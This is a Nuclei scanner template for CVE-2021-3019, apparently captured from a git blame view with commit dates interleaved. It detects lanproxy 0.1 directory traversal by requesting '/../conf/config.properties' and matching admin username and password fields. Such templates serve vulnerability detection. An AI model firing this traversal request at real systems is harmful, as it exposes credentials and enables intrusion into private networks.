2021-01-30 12:22:35 +00:00
|
|
|
id: CVE-2021-3019
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Lanproxy Directory Traversal
|
|
|
|
author: pikpikcu
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: high
|
2021-03-24 06:48:11 +00:00
|
|
|
description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-03-24 06:48:11 +00:00
|
|
|
- https://github.com/ffay/lanproxy/commits/master
|
|
|
|
- https://github.com/maybe-why-not/lanproxy/issues/1
|
2021-03-18 07:54:36 +00:00
|
|
|
tags: cve,cve2021,lanproxy,lfi
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.50
|
|
|
|
cve-id: CVE-2021-3019
|
|
|
|
cwe-id: CWE-22
|
2021-01-30 12:22:35 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/../conf/config.properties"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "application/octet-stream"
|
|
|
|
condition: and
|
|
|
|
part: header
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "config.admin.username"
|
|
|
|
- "config.admin.password"
|
|
|
|
condition: and
|
|
|
|
part: body
|